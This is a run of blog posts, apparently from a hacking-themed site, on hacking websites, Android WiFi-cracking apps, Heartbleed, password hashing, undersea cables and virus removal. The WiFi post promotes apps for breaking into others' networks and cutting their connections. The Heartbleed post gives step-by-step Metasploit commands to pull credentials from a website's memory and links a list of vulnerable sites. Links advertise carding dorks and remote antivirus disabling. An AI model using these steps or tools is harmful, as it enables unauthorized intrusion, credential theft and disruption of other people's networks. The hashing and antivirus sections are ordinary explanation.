The International Council of Electronic Commerce Consultants (EC-Council) is a member-supported professional organization. The EC-Council is known primarily as a professional certification body. Its best-known certification is the Certified Ethical Hacker. CEH, which stands for Comprehensive Ethical Hacker provides complete ethical hacking and network security training courses to learn white hat hacking. To become a professional ethical hacker you just need to select the hacking course package and join to get trained. This site helps you to get all kinds of courses that make you a certified ethical hacker.

Also Read: How to do SIM Cloning

6# Hack In The Box

This is a popular website that provides security news and activities from the hacker underground. You can get huge hacking articles about Microsoft, Apple, Linux, Programming and much more. This site also has a forum community that allows users to discuss hacking tips.

Also Read: Latest Carding Dorks 2017

7# SecTools

As the name suggests, SecTools means security tools. This site is devoted to providing significant tricks about network security that you could learn to fight against the network security threats. It also offers security tools with detailed description about it.

8# Hacking Loops

Hacking Loops is one of the ethical hacking websites where you will get many articles on white hat hacking. Each article on this site seems to be absorbing, and I’m sure you too will. Some of the great posts on this site are “How to stop the virus or trojan attacks”, “Game Ranger hack for the range of Empires”, “Facebook smart status update tool”, and so on.

9# Explore Hacking

Explore Hacking is a site which wants the users to know the importance of information security. I think this website is great for the beginners. Because this site is very keen on providing the lower level to higher level hacking tutorials with fine screenshots. So, that’s the most useful key for the first level hackers to learn complicated hacking methods quickly.

10# Hacking Tutorial

Perfect English isn’t all the things. Hacking Tutorial is an example of when these writing skills of an author do not much relate to the quality of his/her technical information. That is the case over at Hacking Tutorial. Where the author offers an article related to “Client Side Attack Using the Adobe PDF Escape EXE Social Engineering”, “Exploiting MS11_003 Web Explorer Vulnerability”, and “Hacking Using BeeF XSS Framework”.

Also Read: Hack WPA2-PSK WiFi Password Using Linux

.

Note: – This guide is only for knowledge purpose and shouldn’t be used for any illegal activities as we are not responsible for anything happens with this.

We hope that HACKAGON matched our readers’ expectations about 10 Best Websites To Visit If You Want To Be A Hacker. So, if you like this article then don’t forget to share it with your friends. And always feel free to drop a comment below if you have any query or feedback.

How To Hack Wifi Password Using Smartphones

How To Hack WiFi Password Using Smartphones? Every computer and Android geek always think to hack wi-fi network password from Android mobile. With Android Phone, you can do lots of hacking attacks. WiFi hacking is not so easy task but it’s possible with one easy and simple trick. And this is only possible with some cool apps that can be used to hack wi-fi network. So, have a look on complete guide discussed below.

Also Read: Hack WPA2-PSK WiFi Password Using Linux

Top 12 WiFi Hacking App For Android:

Here we have discussed some best apps that you will be using to crack the wi-fi network security. These apps will work only in rooted Android and for that follow the guide to Root to Android. Have a look on these apps below.

Also Read: 2 Best Methods to Hack Wi-Fi using Android Phones

#1 WPS Connect:

WPS Connect

Download => WPS Connect

WPS Connect is Android WiFi Hacking App for a rooted Android phone. With this app, you can disable other user’s net connection on the same wi-fi network. With this WPS Connect application, you can hack any wi-fi network and connect automatically to any password protected wi-fi network. Download WPS Connect and start cracking wi-fi network around you.

Also Read: 10 Best Websites To Visit If You Want To Be A Hacker

#2 Wifi WPS Wpa Tester:

WIFI WPS WPA TESTER

Download =>Wifi WPS Wpa Tester

The best Android app that will work with your rooted Android and is one of the best apps to crack into wi-fi network around you. Using this app, you can connect to some of the routers that have some vulnerabilities that can be targeted by this app. So try out this app, you will surely get the best result that you think of.

Also Read: How To Hack Wifi Password Using Smartphones

#3 WifiKill:

wifikill

Download =>WifiKill

This is one the cool app that will allow killing all the devices that being connected to the wi-fi network. Using this app, you can easily block the internet access to all other devices that connected to the same wi-fi network. So must try this cool app on your Android device.

Also Read: How to do SIM Cloning

#4 Wifinspect:

wifinspect

Download =>Wifinspect

WiFinspect is a multi-tool intended for Computer Security professionals and other advanced users that wish to check the networks they own or have permission, i.e. the app is a security audit tool and not a hacking too. So must try this cool app on your Android device.

Also Read: XSS Attack

#5 ZAnti Penetration Testing Android Hacking Toolkit:

ZAnti

Download =>ZAnti Penetration Testing Android Hacking Toolkit

ZAnti is a mobile penetration testing toolkit that lets security managers assess the risk level of a network with the push of a button. This easy to use mobile toolkit enables IT Security Administrators to simulate an advanced attacker to find the malicious techniques they use in the wild to compromise the corporate network.

Also Read: Folder Blaster Worm

#6 Fing Networks Tools:

Fing Network Tool

Download =>Fing Networks Tools

This is one of the best network analyzer tools that works on your rooted Android. Find out which devices are connected to your Wi-Fi network in just a few seconds and this app is fast and correct. Fing is a professional App for network analysis. A simple and intuitive interface helps you test security levels, detect intruders and resolve network issues.

Also Read: RAT – Remote Administration Tool

 #7 Network Discovery:

Network Discovery

Download =>Network Discovery

This is quite simple and cool app that don’t require root access to do its functioning. So you can use this cool app on your Android to keep track on all the network details that your Android being connected.

Download 12 Hacking Books FREE: HACKER HIGHSCHOOL

#8 Nmap for Android:

nmap

Download =>Nmap for Android

Nmap (network mapper) is one the best among different network scanner (port finder) tool, Nmap mainly developed for Unix OS but now it is available on Windows and Android as well. This application is not an official app but it looks good.

Also Read: Deface Websites Using SQL Injection

#9 WiFi Spoofer:

WiFi Spoofer

Download =>WiFi Spoofer

This app is one of the best security testing tools for your Android. And this can be used to change websites on other people’s computers from your Android-based smartphones. Although this is not exactly a penetration testing tool, it can still show you how easy or difficult it is to hack a particular network with your Android.

Also Read: Disposable Chat Room

#10 WiFi Finder:

WiFi Finder

Download =>WiFi Finder

Wi-Fi Finder is simply the best app for finding free or paid public Wi-Fi hotspots online or offline—perfect for Skype users on the go. It can view Wi-Fi hotspot detail, call location, get directions or share the hotspot, Filter results by location (café, hotel, etc.) or provider type, Scan for Wi-Fi hotspots around you

Also Read: Lock And Unlock Computer With Pendrive

#11 Wifi Analyzer:

WiFi Analyzer

Download =>Wifi Analyzer

Turns your Android phone into a Wi-Fi analyzer! Shows the Wi-Fi channels around you. Helps you to find a less crowded channel for your wireless router.

Also Read: Hack WPA2-PSK WiFi Password Using Linux

#12 WiFi You:

WiFi You

Download =>WiFi You

WiFi You is a powerful app collecting millions of wi-fi passwords shared by end users worldwide and storing & distributing them from our cloud server for you to enjoy free network and traffic saving. It will be your wi-fi key and will automatically find all available WiFi networks nearby. You can connect to the free wi-fi with one single click.

Also Read: Remove Virus Using CMD

Note: – This guide is only for knowledge purpose and shouldn’t be used for any illegal activities as we are not responsible for anything happens with this.

Hope you like this article. So, don’t forget to share it with your friends and feel free to drop a comment below if you still face any kind of problem.

Why you should choose Linux over Microsoft

Linux over Microsoft: There’s never been a better time to give Linux a try.

Wait, don’t slam on that back button! I’m not one of those rabid “Year of the Linux desktop” types. Windows works just fine for hundreds of millions of people, and—sorry, Linux lovers—there’s little to suggest Linux usage will ever be more than a rounding error compared to Microsoft’s behemoth.

That said, there are some pretty compelling reasons you might want to consider switching to Linux on your computer or at least give it a hassle-free trial run.

Also Read: What Is Tor – How Does Tor Work – How to Use Tor?

1. Windows 10’s taking away your choices

Bear with me. This may seem off-topic, but it’s the crux of the issue for a lot of people. Linux’s most alluring feature for many won’t be anything that Linux actually does, but what it doesn’t do. And it’s all due to Microsoft’s folly.

 Windows 10 may be the best Windows ever (and I use it daily on my primary PC) but Microsoft’s pulled some tricks that range from questionable to downright gross to drive its adoption numbers higher and to coax you into using the myriad Microsoft services and paid upgrades baked into the operating system.

It began with endless pop-ups on Windows 7 and 8.1 PCs—pop-ups that started innocently enough before crossing the line into deceptive malware-like tactics. When that didn’t boost adoption numbers high enough, it morphed into nastier tricks and full-on forced upgrades that prompted some fearful owners to disable Windows updates completely and not be pushed into Microsoft’s new operating system.

 More recently, the Windows 10 Anniversary Update bundled some severe negatives in with its plentiful positives. The Cortona digital assistant, which pings Bing servers when you search your PC, is damned near impossible to disable completely now. And when I upgraded my primary PC to the Windows 10 AU, I discovered that all the settings related to the many ways Windows 10 pushes ads at you were re-enabled, after I’d explicitly disabled them earlier. None of my other system settings seem to have been touched. Yuck.
gwx new

LumpyMayoBNI via Reddit

Eventually, Microsoft began pushing Windows 10 out as a Recommended upgrade, forcibly installing it on some systems.

What’s more, Windows 10 changed the way it handles updates to more closely resemble mobile operating systems. You can’t pick and choose which patches to install, or even refuse updates on consumer operating systems. If Microsoft pushes a Windows 10 update, you will receive it eventually. The company also tweaked the way Windows 7 and 8 handle patching. Now, you can no longer choose which each update to install; you have to take the kit and caboodle.

By default, Windows 10 beams much more of your data back to Microsoft than previous Windows versions as well. Most of it can be disabled, but most people don’t dive that far into system settings.

Lots of people are still plenty happy with Windows 10, don’t get me wrong. But these moves are also ruffling the feathers of a lot of users. At the same time…

Also Read: Android L Will Keep Your Secrets Safer

2. Linux is more polished than ever

Most major Linux distributions never abandoned the basic principles of the desktop. While Microsoft enraged the world with the Windows 8 disaster, popular Linux distros like Fedora and Linux Mint kept their heads down and spit-polished the traditional PC interface.

linux mint

Linux Mint with the MATE desktop environment.

For people used to Windows XP and Windows 7, some Linux distros may be easier to wrap your head around than Windows 8 and 10—both of which have a learning curve, just like switching to Linux. Linux Mint’s “Start menu” bears much more similarity to the traditional Windows Start menus than Windows 10’s Live Tile-infused alternative, that’s for sure.

Better yet, Linux’s dark days of rampant incompatibility with PC hardware—especially networking and audio components—have largely been eradicated. Most Linux operating systems just plain work with a wide swathe of modern PCs and PC hardware, though you may need to do a few extra steps to install Linux on a PC with Intel’s Secure Boot enabled. Better yet, you can test Linux distros on your PC before actually installing them, so you’ll know whether everything works. We’ll get into that a bit later, though.

The key point, however, is that Linux is no longer a junky, broken mess useful only to dyed-in-the-wool geeks anymore. There are many polished, refined distros that anybody can pick up and use.

Also Read: Audio Tour App Detour Steers You Away from the Typical Tourist Traps

3. Open-source software is, too

The quality—or lack thereof—of open-source software was another longtime bugbear for Linux. No more. These days, Linux houses superb alternatives to all the most-used Windows software, from Office rivals (Libre Office) to Photoshop alternatives (GIMP) to media players (VLC). That trio alone covers the typical software usage of many households, and PCWorld’s guide to the best open-source software for everyday PC users features much more. Many top-notch video games even call Linux home now thanks to the arrival of Valve’s Linux-powered Steam Machines.

Playing copy-protected movies and music used to be another major Linux a headache. Once again, that’s no longer the case. VLC will run almost anything you throw at it, while Chrome (and Firefox soon) support streaming videos from the likes of Netflix and Amazon Instant Video.

netflix on linux

Chrome for Linux playing Netflix on Ubuntu. Oh, Archer, you’re so silly!

But standard PC usage for a lot of people revolves around the web—checking Facebook, slinging email, browsing YouTube and Amazon, et cetera. Naturally, those all work just fine on Chrome and Firefox in Linux. The browsers work the same as they do on Windows.

The modern Linux ecosystem can handle everything you throw at it, and handle it well (though hardcore gamers may still want to keep a copy of Windows handy). And did I mention most of the software available for Linux is free, too? Just like…

Also Read: How Internet Providers Get Around War Zones

4. Linux is free

Hey, it is. Not only does that make it relatively risk-free to try, but it also means you won’t need to spend $100 on a Windows license if you’re building a PC from scratch or upgrading an old computer.

Also Read: Let’s Build a Traditional City and Make a Profit

5. Linux runs great on old PCs

Windows XP was tossed to the wolves long ago, and Windows Vista’s end is rapidly drawing near. But hundreds of millions of people rely on PCs that are several years old. Installing Linux not only plops an up-to-date (and updated) operating system on your PC, it can breathe new life into your computer if you choose a lightweight distro designed for aging PCs, such as Puppy Linux or Lubuntu (a.k.a. “Lightweight Ubuntu”).

old pcs stock image

The transition doesn’t have to be painful, either. There are many easy Linux alternatives designed for Windows XP refugees. These distros offer dedicated “Windows XP Modes” that mimic the look and feel of Microsoft’s most venerable operating system.

Also Read: UK to allow driverless cars on public roads in January

6. Linux is easy to try

Okay, okay, I’ve sold you. You’re ready to test-drive Linux. Fortunately, Linux is dead simple to try. You don’t even have to ditch Windows if you’re feeling hesitant.

Before you install a Linux distro on your PC’s hard drive. I suggest giving your chosen operating system a whirl with a live drive or live DVD. With live drives, you install a bootable system of a Linux distro to a DVD or flash drive. Then configure your PC to boot from that and not your hard drive. It takes minimal muss and fuss. Lets you try several Linux operating systems quickly and doesn’t touch the Windows installation on your primary storage drive.

fedora live cd start

PCWorld’s tutorial on creating a bootable Linux flash drive can help you set one up. But which Linux operating system should you try? Our guide to the best Linux distros for beginners can guide your decision. Personally, I think Linux Mint provides the best experience for experimental Windows users. Because it mixes Ubuntu’s flexible approach to closed-source software with a Windows-like interface.

Using Linux shouldn’t be too much of a hassle, especially if you opt for an operating system with a Windows-like Start menu, but there are several core differences. Read our beginner’s guide to Linux to go in with both eyes open, and don’t be afraid to ask questions if you run into a problem. Most major Linux distros offer an online forum with dedicated help sections.

install ubuntu alongside windows

Installing Ubuntu Linux alongside Windows.

If you decide you like Linux, you can use the same live drive (or disc) to install your new operating system on your hard drive. You can keep Windows on your PC if you’d like, too. PCWorld’s guide to dual-booting Linux and Windows explains everything you need to know. And again, if you run into pesky Secure Boot errors while trying to install your Linux OS of choice, refer to our primer on installing Linux on PCs with Secure Boot.

See? That wasn’t so hard. If you’re running an older PC with limited hardware or a dead OS, or if you’re irked at some of Microsoft’s recent decisions around Windows 10. Then there’s no reason not to give Linux a try. You might just like what you find—especially if you spend most of your digital life in a browser and productivity suite.

So at least for once try Linux over Microsoft and tell us your experiences dealing with it 🙂

What is Heartbleed Bug

On April 7, 2014, OpenSSL received a fix to a very popular and controversial vulnerability The Heartbleed bug. On that day, over half a million web servers were found to be vulnerable. Fortunately, that number is steadily decreasing and just like every other exploit, the Heartbleed bug is now out in the wild and the epidemic may never be fully eliminated (A hacker can dream, right?)

This vulnerability allows a hacker to extract information from a server’s memory which may contain authentication credentials, cookies, the server’s private key (even the admin password), and personally identifiable info (PII) that could be used for identity theft. The biggest websites on the internet were vulnerable. Facebook, Google, Twitter, Instagram, Yahoo, Pinterest, Tumblr, Dropbox and a few million more. All these websites were quick to announce, within a few weeks, that they’ve successfully patched the bug. What they didn’t announce, is that this vulnerability existed even 2 years ago and only now came to light. This is also part of the reason users were recommended to change all passwords everywhere. The NSA has (allegedly) been using this vulnerability for years to exploit websites.

Also Read: XSS Attack

OpenSSL is an encryption library used in HTTPS (secure HTTP)

If you ever notice URL bar after typing the address, say “google.com” you’ll see that it automatically changes to “https://www.google.com”. That is the job of OpenSSL. OpenSSL basically encrypts all communication between the server and the client while it takes place through the HTTPS URL. This makes all the password sniffing cookie stealing hacks impossible (sad face).

OpenSSL uses a handshake, or more popularly, a “heartbeat” that echoes back a signal to verify that the data was received correctly, during communication. It’s a bit like double checking whether the message was successfully received or not (Like the two tick marks you can see on WhatsApp messages).

Also Read: Latest Carding Dorks 2017

What is Heartbleed Bug?

The appropriately named Heartbleed bug vulnerability enables a hacker to trick OpenSSL by sending a message that is misinterpreted by the server running OpenSSL. Which then actually sends back the real data without any questions asked. The exact details are a bit technical. But thanks to Metasploit we don’t need to worry about them. Roughly translated, a single byte of data is sent to the server telling it that we actually sent 64K bytes of data. The server will then send back 64K bytes of data to be checked and echoed back.

After this ‘heartbeat’, the server again sends 64K of random data from its memory. That 1 byte has the buggy requests which confuses the server making it give up random information. So, with every ‘heartbeat’ we get 64Kb of private information (That’s enough for ~64,000 characters in plain unencrypted text. A lot of it will be rubbish but still enough for A LOT of accounts and passwords)

Also Read: Metasploit Tools And Cheat Sheet

Now for the Exploit

Here you’ll learn to exploit the Heartbleed bug for getting a buggy website’s OpenSSL to spill the contents of its memory and possibly give us the user’s credentials and other information:

Step 1: This should be the good time to update Metasploit to get the new auxiliary module for Heartbleed. (Unless you downloaded Metasploit after the exploit was released).

Type: kali > msfupdate
Metasploit will then go through the long and slow process of checking and updating its modules and framework. The update has completed and we’re ready to begin, by returning to the command prompt.

Step 2: Start Metasploit
kali > msfconsole

Step 3: Find Heartbleed using the built-in search feature.

Type: search heartbleed
This should bring up two auxiliary modules for Heartbleed. We want the one under ‘scanner’ folder and not ‘server’.

Step 4: Load up the auxiliary module
use auxiliary/scanner/ssl/openssl_heartbleed
This will load the heartbleed module.

Whenever using a new module, you may wish to find more about it and the options we can set for it.
msf > info
This command reveals the options that we can set to use this module and a description of the module.

Step 5: Set RHOSTS. RHOSTS refers to the website that is vulnerable to the Heartbleed bug. We can set it to the IP address of the website as shown below (To find the IP address of a website, simply ping it through the command line (e.g : ping www.google.com) :
msf > set RHOSTS 192.168.1.169
msf > set verbose true

Finally, set the option “verbose” to “true”. This will give us verbose output (i.e., everything that Metasploit receives from the server will be shown to us).

Step 6: Let her rip.
msf > run

If everything went as planned the server will leak about 64K bytes of what was in its memory. This could contain anything from username-password pairs to credit card numbers which is why this hack (along with pretty much all others) is very much illegal to actually try on a live website without the developer’s explicit consent.

Here is an interesting page listing the names of thousands of vulnerable websites: https://zmap.io/heartbleed/

Also Read: Disable Antivirus In Remote PC

Note:– This guide is only for knowledge purpose and shouldn’t be used for any illegal activities as we are not responsible for anything happens with this.

Hope HACKAGON have provided a healthy knowledge about Heartbleed Bug. So, stay secure and keep learning. If you like this article then don’t forget to share it with your friends and always feel free to drop a comment below, if you have any query or feedback.

hashes

Hashes


There are a lot of hurdles you will have to cross before you get to a point where you can call yourself a “Hacker” and so is Hashes. For one, everyone expects you to know everything to know about everything related to computers – Software, Hardware, networking and everything you can do with these three things (i.e. everything).

Speaking from experience, as one sets out for newer and bigger and more complicated hacks, often the biggest problems arises due to a weak foundation – lack of knowledge about a particular field. Hence, not only are you expected to know everything about Hacking and computers, but you are required for calling yourself a “Hacker”. Reason being, you might hit a roadblock, overcoming which could be quite simple but you wouldn’t know that since you’re not familiar with that field and end up spending hours on it. Forget thinking outside the box, start thinking in a whole new dimension.

With all that in mind, Here we discuss “Hashes”

A cryptographic hash function or algorithm is one that takes an arbitrary block of data and returns a fixed-length string (the hash), such that any (accidental or intentional) change to the data will (with very high probability) change the hash value. The data to be encoded are often called the message, and the hash value is sometimes called the ‘Message Digest’ or simply ‘Digest’.

In a nutshell, say we have this string “Hello”. We run it through a Hashing function and we get something like “kjadhs4as187d9dgh332g35g4”
This is the basic use of Hashing – Hiding Data. Obviously, no sane and sober person can decipher the original “Hello” from that weird string up above (Or can they? Read on…)

Ideal hash functions make it very difficult to get the original message back from the digest. It should be reasonably easy to compute a hash for a given message, infeasible to generate a message with a given hash or to change a message without changing the resultant hash. For practical reasons, we should never find two messages with the same hash. (Read that again)

While no completely ideal function exists, functions which aim for these properties can prove very useful. A classic example of cryptographic hash use is in the storage of passwords. When you sign up for a website, your data is usually stored in a database on servers. The issue is that if your password is stored on the server as regular text and if somebody hacks into the server, your password and everything it gave access to is gone. If your password is hashed on the server, however, an attacker shouldn’t be able to formulate your password from the stored value.

This concept may leave some wondering how a password entered at a later date could then be compared to the stored value to check if the login information is correct, but in fact, this is quite simple. You create an account, type in a password, the server hashes it and stores the digest. On the next login, the inputted password is simply hashed using the same function again, and this new digest is compared to that in the database – if they match, the inputs were the same and the user is allowed access to his/her account. Definitely, a more CPU intensive way to go, but it is what’s keeping our accounts safe.

Situations like this are also where the function property being “infeasible to find two messages with the same hash” becomes very important. If two values generate the same hash (these situations are called collisions, and are something that pretty much all hash functions are vulnerable to), somebody could input an incorrect password yet it could confirm as correct. Yes, you read that correctly!

And now! The million dollar question – How is it even possible to have an algorithm that can give a result which cannot be worked back from?

This really is the cornerstone of hash functions – especially as most secure algorithms are open source and available to the public. The most popular ones are called SHA1 and MD5 if you’re into programming go ahead and google them up to know more about them.

For those who don’t mind a little math, here’s a small example:

**[Math]**
Take ‘4’ , Square it.
»16 , Take natural log.
»2.7725 , Multiply by pi.
»8.7103 , Take factorial (gamma function).
»189843.119 ***

Now ask a friend how is 189843.119 related to 4 and watch them laugh at your face. Chances are, even if s/he actually attempts to figure it out they may never get the answer. Meaning, you (the server) have successfully fooled your friend (the hacker). Only a metaphor. Of course, you (the server) can do the same with no problem because you know the exact functions. Just for a comparison, real Hashing functions are so complex even massive supercomputers may not be able to rework the original message from the digest.

The irreversibility isn’t actually as impossible as it might first sound – the tough bit comes in compromising this with all the other ideal properties. The trick is to split the message into a number of blocks, and then jumble them up and interact with each other to get some last seemingly random value pop out. Plus, they may contain not only apparent chaos but the real loss of information, say by cutting off decimal places or approximating large factorials. Meaning, there literally may not be anything related to the original message, not even enough information to actually trace back the message, even by the server hashing it in the first place. Further, a good hash function should produce totally different results if even a single character is changed. So, chop off one decimal place and the hash of “123password” might seem to become the one from “ladygaga” for example. Weird, right? (The function, not Lady Gaga XD) (P.S. – Alphabets or any characters can be literally converted into fixed numbers by taking their respective ASCII codes- which are simply some numbers assigned to every character on your keyboard.)

Rainbow Tables and Salting:

Hash functions are generally pretty strong, however, as always, a brute force attack is a way around the security. You may have heard of things called Rainbow Tables – These are essentially massive tables of Message-Digest pairs for a certain algorithm. Indirectly, a trade-off between time taking CPU power and memory storage. (Message-Digest the pair simply means, in this case, a possible password and the weird string it gives when to running through a hashing function)

For example, say a bunch of powerful computers has worked at generating message-digest pairs for an algorithm for a fair amount of time (a lot of combinations), and they’ve managed to list all the character combinations and associated hashes for up to 5 characters in message length with a known hashing function. If you’re running a website which simply hashes users passwords in a database with this popular (and presumably secure) algorithm, this means that if your users’ passwords aren’t very complex, they may already be listed in the rainbow table. So if an attacker breaks in, they could simply run all the hashes against the rainbow table, hence getting the original passwords for users with weaker passwords.

For example, say your database shows the association

user: JBsux
password: 9d4e1e23bd5b72

However, an entry for “9d4e1e23bd5b72” is found in the rainbow table through a quick search through, and the hash is translated back into the original password, say: “IsecretlyluvJB” and now, you’re screwed, in more than one way.

This is a pretty big problem – not only can users not really be trusted to come up with secure passwords a lot of the time, but popular algorithms are usually the more secure ones, however, this, in turn, means that more people will be interested in putting their CPU horsepower towards bettering the rainbow tables to break more hashes in that algorithm.

(Note: Rainbow tables are just a method to brute force and they suffer from the same weakness: Exponential growth. While most passwords up to 8 characters can be crammed into a reasonable 4 Terabyte hard disk, take it up to 12 characters and you’re looking at over 10 freaking Exabytes or 10 million Terabytes. Further, I got this figure by using the charset: {A-Z, a-z, 0-9} = I didn’t even consider symbols. Count those in and you literally cannot store the possible combinations on every storage device on the planet, combined. Oh, and did I mention that it might actually take even a supercomputer possibly hundreds of thousands of years to actually create that much data? And still, Rainbow tables are practical enough to deserve a mention here and they actually do work, Amazing isn’t it? The main reason being – Weak Passwords. (Surprisingly, “IsecretlyluvJB” at 14 characters long is actually pretty strong and the above example would be technically and practically correct only for a smaller password like “pass”))

Luckily, this problem isn’t too difficult to solve. Generating rainbow tables are only really practical for an amount of characters as the possible combinations of characters simply gets too high for a rainbow table to be generated for all the combinations practically. So to combat rainbow tables, all we really have to do is add a bunch of characters to the end of the password before we hash it, and we have a totally different hash which won’t be in the rainbow table. These extra characters are called salts. These are usually pretty big, around 10-20 or more characters and protect the naïve users who put in a 4 character password. The server may simply append the salt to the user inputted password and then hash it.

There’s one more important precaution that should be taken. Another example: Say, we own a site with millions of users. If we use the same salt for each user password, it’s probably worthwhile for attackers to go out of their way to actually generate a custom rainbow table for values with our salt attached to them! The solution to this is also very simple – use random salts. If salts are different for each user, there’s no way that an attacker can try to get all the passwords in the database, even with a lot of time and a lot of storage memory whereas for the server, it can simply store the username and password hash along with the randomly generated salt and use it again when the user enters the password for logging in.

If attackers wanted to target a specific user, of course, they could waste a whole bunch of time trying to generate a rainbow table specifically for that salt, however, if the user has a strong password it will simply take too long as there are way too many character combinations that the password could contain.

In conclusion, Hashes are today’s way of encrypting (mostly) passwords. A great invention, they are here to stay for a while but like every security system, they are flawed. There’s only so much a company and their servers can do to make sure their users are kept safe, in the end, it’s up to the users to look out for themselves. The annoying websites which keep the passwords to contain say, A capital letter + A number + A symbol, are in fact the most secure. Whereas the ones who accept 4 character length passwords, although convenient are also the most insecure, Hence it’s up to the user to keep themselves safe.

A peek into the world to come tells us passwords themselves will become obsolete in the not so distant future. With BioMetrics already rising up in the world of security. Fingerprint and Retina Scanners, Handwriting and Facial Recognition software etc. mark the beginning of the next big step in the field of cyber safety. Further with the advent of the so-called “Quantum Computers” just beyond the horizon, each of us will have access to CPU’s dozens, perhaps hundreds of times faster than the ones on the market. The billion year long brute force attacks might soon take as little as a few seconds. Breathe a sigh of relief, quantum computing is mostly theoretical for the time being and is just about as real as light sabers in star wars (They are at little glow sticks as compared to light sabers). Right now, we can let them be our grandchildren’s headache

Rewinding to the present, passwords are here to stay (for the near future at least), and so are Hashes. Luckily for us, the hackers, this provides us with just another loophole to exploit.

Note: – This guide is only for knowledge purpose and shouldn’t be used for any illegal activities as we are not responsible for anything happens with this.

Hope HACKAGON have provided a healthy knowledge about Hashes. So, stay secure and keep learning and if you like this article then don’t forget to share it with your friends and always feel free to drop a comment below if you have any query or feedback.

How Internet Providers Get Around War Zones

In January 2008, something sharp — mostly likely an errant ship anchor — sliced into two underwater cables in the Mediterranean Sea off the coast of Egypt, near Alexandria. Egypt lost 80% of its internet capacity. But the effects were hardly limited to that country. Slowdowns were reported across Asia. Saudi Arabia lost 40% of its national network. Even Bangladesh, some 3,700 miles away, lost a full third of its connectivity.

Why did just two cuts lead to such widespread disruption? The classic, and least expensive, way to route internet from South Asia to Europe is via a vast system of submarine fiber optics running from the southern coast of France through the Mediterranean, into the Red Sea via the Suez, and finally out into the Indian Ocean and points beyond. Many of the countries hurt the most by the cuts relied heavily on this path, with only light redundancy coming in from the east — East Asia and beyond the Pacific Ocean, North America — to protect against an event like this.

And shipping accidents are hardly the only hazards associated with running fiber-optic cable through the Middle East. It’s a very real possibility that an act of war — a bombing or a firefight — in one of the most unstable regions in the world could literally disrupt bulk financial transactions running between skyscrapers in London and Abu Dhabi.

The economic consequences of such an outage are obvious and devastating, and they don’t only hurt big banks. Take just India, with its booming virtual outsourcing sector, enormously reliant on dependable internet. By some reports, 60 million people in India were affected by the 2008 disruption.

Jim Cowie, then the head of research and development at Renesys, an internet intelligence company, was taking notes. “It’s very embarrassing to have to explain to stock markets and banks that the internet is out and will be out for weeks,” Cowie said.

In the wake of the 2008 disruption, companies on both ends of the Mediterranean route began clamoring for redundancy, or the creation of alternative network links from Europe to Asia. And over the past half-decade, a series of enormous European and Asian telecom consortia have done just that, building four new overland fiber-optic pathways to link Europe to the financial hubs of the Persian Gulf and the booming economies of South Asia.

The new pathways are displayed on the map above, which was made by Dyn, the New Hampshire company that manages traffic for some of the biggest sites on the internet (and that acquired Renesys in May). The new routes are faster than the submarine route — up to 20 milliseconds faster from the Persian Gulf to London, a hugely significant amount of time when it comes to automated financial transactions — and also costlier. But ISPs, banks, and other major companies will readily pay a premium to diversify the source of their internet service and ensure that they aren’t vulnerable to future outages.

A Saudi Telecom Company map of the JADI (Jeddah-Amman-Damascus-Istanbul) Network Via stc.com.sa

Still, reaching South Asia from Europe by land requires traveling through the Middle East, and none of the new networks can completely avoid regions marked by the kind of conflict that — in addition to every other kind of financial and human cost — could produce a future outage.

Take the JADI network (displayed in the top image as yellow), which runs for nearly 1,600 miles from Istanbul to Jeddah. Less than a year after JADI traffic became available for purchase, Syria broke out in civil war, and the cable, which runs through Aleppo, has sustained chronic damage, disrupting the network.

The stakes of these new networks are high, with their own very present, very real dangers: Syrian network technicians whom Cowie describes as “heroic” literally “roll trucks in the middle of a firefight to repair the damage.”

That’s the most dramatic example. But the other cable paths all face their own challenges. The network represented above in purple is, according to Cowie, in service, though it bypasses the Suez via Israel, a country rapidly descending into violent conflict. The path running through Iraq in orange has experienced difficulties in “coordination and agreement,” according to Cowie, due to a lack of cooperation between the autonomous Kurdish authorities and their Arab counterparts.

Even the so-called EPEG (Europe-Persian Express Gateway), which has managed to avoid major disruptions despite running through volatile parts of the Caucasus and which Cowie calls “the biggest success story” on the map, passes through a newly turbulent eastern Ukraine (and, notably, leaders who have not been shy to threaten other kinds of pipeline disruption).

Ultimately, the only way for corporate and institutional interests to make sure that they don’t suffer outages in the future is to make the sources of internet they buy access to as diverse as possible. That way no single act of man or nature proves so catastrophic as to repeat the disastrous disruptions of 2008.

Or, as Cowie said, “The remedy for all of these is politically neutral”: More cable.

Uprooting Virus

A computer virus is a malicious software (also known as “Malware”) that can copy itself and infect other software or files on your computer. If you suspect your computer has been infected, then several antivirus websites provide step-by-step instructions for removing viruses and other malware. So let’s see the procedure of Uprooting Virus.

How to remove and avoid computer viruses?

Fortunately, if you update your computer and use free antivirus software such as AVG, you can help permanently remove unwanted software and prevent installation in the first place.

How do I know if my computer has been infected?

After you open and run an infected program or attachment on your computer, you might not realize that you’ve introduced a virus until you notice something isn’t quite right. Here are a few indicators that your computer might be infected:

  • Your computer runs more slowly than normal.
  • Your computer stops responding or freezes often.
  • Your computer crashes and restarts every few minutes.
  • Your computer restarts on its own and then fails to run normally.
  • Applications on your computer don’t work correctly.
  • Disks or disk drives are inaccessible.
  • You can’t print correctly.
  • You see unusual error messages.
  • You see distorted menus and dialog boxes.

These are common signs of infection — but they might also indicate hardware or software problems that have nothing to do with a virus. Unless you run some kind of Malicious Software Removal Tool and install industry-standard, up-to-date antivirus software on your computer, there is no way to be certain if your computer is infected with a virus or not. Beware of messages warning that you’ve sent in the email that contained a virus. This can indicate that the virus has listed your email address as the sender of the tainted email. This does not necessarily mean you have a virus. Some viruses have the ability to forge email addresses. In addition, there is a category of malware called Rogue Security software that works by causing fake virus alerts to pop up on your computer.

How to install updates and also the antivirus software if you can’t use your computer?

It might be difficult to download tools or update your computer if your computer has a virus. In this case, you can try one of the following options:

  • Use another computer to download the tools to a disk.
  • Get help through your Antivirus’s website support.
  • Have your system checked by a Technician

How can I prevent infection by computer viruses?

Nothing can guarantee the security of your computer, but there’s a lot you can do to help lower the chances that you’ll get a virus.
It’s crucial to keep your antivirus software updated with the latest updates (usually called definition files) that help the tool identify and remove the latest threats. You can continue to improve your computer’s security and decrease the possibility of infection by using a firewall, keeping your computer up to date, maintaining a current antivirus software subscription, and following a few best practices.

Tip: Because no security method is guaranteed, it’s important to back up critical files on a regular basis.

We hope that HACKAGON matched our reader’s expectations about Uprooting Virus. so, if you like this article then don’t forget to share it with your friends and always feel free to drop a comment below if you have any query or feedback.


